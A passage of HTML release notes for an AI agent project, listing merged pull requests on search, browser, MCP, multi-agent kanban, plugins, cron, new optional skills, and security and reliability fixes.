<li><strong>Semantic diagnostics from real language servers in <code>write_file</code>/<code>patch</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24168" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24168/hovercard">#24168</a>)</li>
<li><strong>Shift baseline diagnostics into post-edit coordinates</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25978" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25978/hovercard">#25978</a>)</li>
</ul>
<h3>Search &amp; web</h3>
<ul>
<li><strong>Brave Search (free tier) and DDGS search providers</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/21337" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21337/hovercard">#21337</a>)</li>
<li><strong>Bearer auth header for Tavily <code>/crawl</code> endpoint</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24658" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24658/hovercard">#24658</a>)</li>
</ul>
<h3>X (Twitter)</h3>
<ul>
<li><strong>Gated <code>x_search</code> tool with OAuth-or-API-key auth</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26763" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26763/hovercard">#26763</a>)</li>
</ul>
<h3>Browser</h3>
<ul>
<li><strong>Route <code>browser_console</code> eval through supervisor's persistent CDP WS (180x faster)</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23226/hovercard">#23226</a>)</li>
<li><strong>Support externally managed Camofox sessions</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24499" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24499/hovercard">#24499</a>)</li>
</ul>
<h3>MCP</h3>
<ul>
<li><strong><code>supports_parallel_tool_calls</code> for MCP servers</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265444652" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/9944" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/9944/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/9944">#9944</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26825" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26825/hovercard">#26825</a>)</li>
<li><strong>Codex preset for Codex CLI MCP server</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4412978691" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22663" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22663/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22663">#22663</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22679" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22679/hovercard">#22679</a>)</li>
<li><strong>Stop retrying initial MCP auth failures</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4445105387" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25624" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25624/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25624">#25624</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25776" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25776/hovercard">#25776</a>)</li>
</ul>
<h3>Google Workspace</h3>
<ul>
<li><strong>Drive write ops + Docs/Sheets create/append</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/21895" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21895/hovercard">#21895</a>)</li>
</ul>
<h3>Per-turn verifier</h3>
<ul>
<li><strong>Per-turn file-mutation verifier footer</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24498/hovercard">#24498</a>)</li>
</ul>
<hr>
<h2>🧩 Kanban (Multi-Agent)</h2>
<ul>
<li><strong><code>specify</code> — auxiliary LLM fleshes out triage tasks</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/21435" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21435/hovercard">#21435</a>)</li>
<li><strong>Orchestrator board tools — <code>kanban_list</code> + <code>kanban_unblock</code></strong> (carve-out of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4388855286" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/20568" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20568/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/20568">#20568</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23012" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23012/hovercard">#23012</a>)</li>
<li><strong><code>stranded_in_ready</code> diagnostic for unclaimed tasks</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23578/hovercard">#23578</a>)</li>
<li><strong>Dashboard batch QOL upgrade</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415907547" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/23240" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23240/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/23240">#23240</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23550" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23550/hovercard">#23550</a>)</li>
<li><strong>Tooltips and docs link across dashboard</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/21541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21541/hovercard">#21541</a>)</li>
<li><strong>Dedupe notifier delivery via atomic claim + rewind on failure</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4412567868" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22558" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22558/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22558">#22558</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23401" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23401/hovercard">#23401</a>)</li>
<li><strong>Keep notifier subscriptions alive across retry cycles</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400178047" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21398" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21398/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21398">#21398</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23423" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23423/hovercard">#23423</a>)</li>
<li><strong>Drop caller-controlled author override in <code>kanban_comment</code></strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4409830771" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22109" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22109/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22109">#22109</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22435" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22435/hovercard">#22435</a>)</li>
<li><strong>Sanitize comment author rendering in <code>build_worker_context</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22769" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22769/hovercard">#22769</a>)</li>
</ul>
<hr>
<h2>🧠 Plugins &amp; Extension</h2>
<h3>Plugin surface</h3>
<ul>
<li><strong>Run any LLM call from inside a plugin via <code>ctx.llm</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23194" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23194/hovercard">#23194</a>)</li>
<li><strong><code>tool_override</code> flag for replacing built-in tools</strong> (closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276172104" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/11049" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/11049/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/11049">#11049</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26759" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26759/hovercard">#26759</a>)</li>
<li><strong><code>standalone_sender_fn</code> for out-of-process cron delivery</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22461" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22461/hovercard">#22461</a>)</li>
<li><strong><code>HERMES_PLUGINS_DEBUG=1</code> surfaces plugin discovery logs</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22684" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22684/hovercard">#22684</a>)</li>
<li><strong>Hindsight-client as optional dependency</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21818/hovercard">#21818</a>)</li>
</ul>
<h3>Profile &amp; distribution</h3>
<ul>
<li><strong>Shareable profile distributions via git</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/20831" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20831/hovercard">#20831</a>)</li>
</ul>
<hr>
<h2>⏰ Cron</h2>
<ul>
<li><strong>Routing intent — <code>deliver=all</code> fans out to every connected channel</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/21495" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21495/hovercard">#21495</a>)</li>
<li><strong>Support name-based lookup for job operations</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26231/hovercard">#26231</a>)</li>
<li><strong>Blank Cron dashboard tab + partial-record crashes</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4396341916" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21042" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21042/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21042">#21042</a> + <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4411464552" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22330" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22330/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22330">#22330</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22389/hovercard">#22389</a>)</li>
<li><strong>Do not seed <code>HERMES_SESSION_*</code> contextvars from cron origin</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4411575899" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22356" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22356/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22356">#22356</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22382" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22382/hovercard">#22382</a>)</li>
<li><strong>Scan assembled prompt including skill content for prompt injection</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4171149796" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/3968" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/3968/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/3968">#3968</a>)</li>
</ul>
<hr>
<h2>🧩 Skills Ecosystem</h2>
<h3>Skills Hub</h3>
<ul>
<li><strong><code>hermes-skills/huggingface</code> as a trusted default tap</strong> (closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117085837" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2549" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2549/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2549">#2549</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26219" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26219/hovercard">#26219</a>)</li>
<li><strong>Show per-skill pages in the left sidebar</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26646" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26646/hovercard">#26646</a>)</li>
<li><strong>Richer info panels on the Skills Hub</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22905" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22905/hovercard">#22905</a>)</li>
<li><strong>Refuse <code>skill_view</code> name collisions instead of guessing</strong> (closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4224310629" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/6136" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6136/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/6136">#6136</a> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/polkn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/polkn">@polkn</a>)</li>
</ul>
<h3>Curator</h3>
<ul>
<li><strong>Show rename map in user-visible summary</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22910" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22910/hovercard">#22910</a>)</li>
<li><strong>Hint at <code>hermes curator pin</code> in the rename block</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23212" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23212/hovercard">#23212</a>)</li>
</ul>
<h3>New optional skills</h3>
<ul>
<li><strong>Hyperliquid</strong> — perp/spot trading via SDK + REST (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4096174558" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/1952" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/1952/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/1952">#1952</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23583" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23583/hovercard">#23583</a>)</li>
<li><strong>Yahoo Finance</strong> market data (<a href="https://github.com/NousResearch/hermes-agent/pull/23590" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23590/hovercard">#23590</a>)</li>
<li><strong>api-testing</strong> (REST/GraphQL debug, salvages <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090616596" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/1800" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/1800/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/1800">#1800</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23582/hovercard">#23582</a>)</li>
<li><strong>Unified EVM multi-chain skill</strong> (salvages <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4441931751" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25291" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25291/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25291">#25291</a> + <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098909401" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2010" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2010/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2010">#2010</a> + folds in base/) (<a href="https://github.com/NousResearch/hermes-agent/pull/25299" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25299/hovercard">#25299</a>)</li>
<li><strong>darwinian-evolver</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26760" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26760/hovercard">#26760</a>)</li>
<li><strong>osint-investigation</strong> (closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4020048213" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/355" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/355/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/355">#355</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26729" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26729/hovercard">#26729</a>)</li>
<li><strong>pinggy-tunnel</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26765" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26765/hovercard">#26765</a>)</li>
<li><strong>watchers</strong> — RSS / HTTP JSON / GitHub polling via cron no-agent (<a href="https://github.com/NousResearch/hermes-agent/pull/21881" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21881/hovercard">#21881</a>)</li>
<li><strong>Notion overhaul for the Developer Platform</strong> (May 2026) (<a href="https://github.com/NousResearch/hermes-agent/pull/26612" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26612/hovercard">#26612</a>)</li>
</ul>
<hr>
<h2>🔒 Security &amp; Reliability</h2>
<h3>Security hardening</h3>
<ul>
<li><strong>Sudo brute-force block + sudo-stdin/askpass DANGEROUS</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4410605303" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22194" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22194/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22194">#22194</a> + <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4397828876" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21128" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21128/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21128">#21128</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23736" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23736/hovercard">#23736</a>)</li>
<li><strong>Drop caller-controlled author override in <code>kanban_comment</code></strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4409830771" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22109" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22109/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22109">#22109</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22435" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22435/hovercard">#22435</a>)</li>
<li><strong>Cover remaining SSRF fetch paths in skills-hub</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4413740551" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22804" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22804/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22804">#22804</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22843" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22843/hovercard">#22843</a>)</li>
<li><strong>Use credential_pool for custom endpoint model listing probes</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4413750085" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22810" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22810/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22810">#22810</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22842/hovercard">#22842</a>)</li>
<li><strong>Require dashboard auth for plugin API routes</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374329621" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/19541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/19541/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/19541">#19541</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23220" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23220/hovercard">#23220</a>)</li>
<li><strong>Sanitize env and redact output in quick commands + remove write-only <code>_pending_messages</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23584" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23584/hovercard">#23584</a>)</li>
<li><strong>Reduce unnecessary <code>shell=True</code> in subprocess calls</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25149" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25149/hovercard">#25149</a>)</li>
<li><strong>Sanitize Google Chat sender_type from relay</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4409786696" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22107" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22107/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22107">#22107</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22432" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22432/hovercard">#22432</a>)</li>
<li><strong>Supply-chain advisory checker</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24220" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24220/hovercard">#24220</a>)</li>
<li><strong>Rewrite security policy around OS-level isolation as the boundary</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/20317" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20317/hovercard">#20317</a>)</li>
<li><strong>Remove public security advisory page</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24253" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24253/hovercard">#24253</a>)</li>
</ul>
<h3>Reliability — notable bug closures</h3>
<ul>
<li><strong>SQLite: fall back to <code>journal_mode=DELETE</code> on NFS/SMB/FUSE</strong> (fixes <code>/resume</code> on network mounts) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22043" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22043/hovercard">#22043</a>)</li>
<li><strong>Codex-runtime: retire wedged sessions + post-tool watchdog + OAuth refresh classify</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25769" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25769/hovercard">#25769</a>)</li>
<li><strong>Codex-runtime: de-dup <code>[plugins.X]</code> tables and stop leaking HERMES_HOME</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4452637433" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/26250" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/26250/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/26250">#26250</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26260" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26260/hovercard">#26260</a>)</li>
<li><strong>Daytona: migrate legacy-sandbox lookup to cursor-based <code>list()</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24587" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24587/hovercard">#24587</a>)</li>
<li><strong>MCP: stop retrying initial MCP auth failures</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4445105387" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25624" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25624/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25624">#25624</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25776" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25776/hovercard">#25776</a>)</li>
<li><strong>Gateway: enable text-intercept for multi-choice clarify fallback</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4444770745" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25587" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25587/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25587">#25587</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25778" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25778/hovercard">#25778</a>)</li>
<li><strong>Gateway: keep running when platforms fail; per-platform circuit breaker + <code>/platform</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26600" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26600/hovercard">#26600</a>)</li>
<li><strong>Delegate: salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4407521894" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21933" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/21933/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/21933">#21933</a> JSON-string batch + diagnostic logging</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22436" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22436/hovercard">#22436</a>)</li>
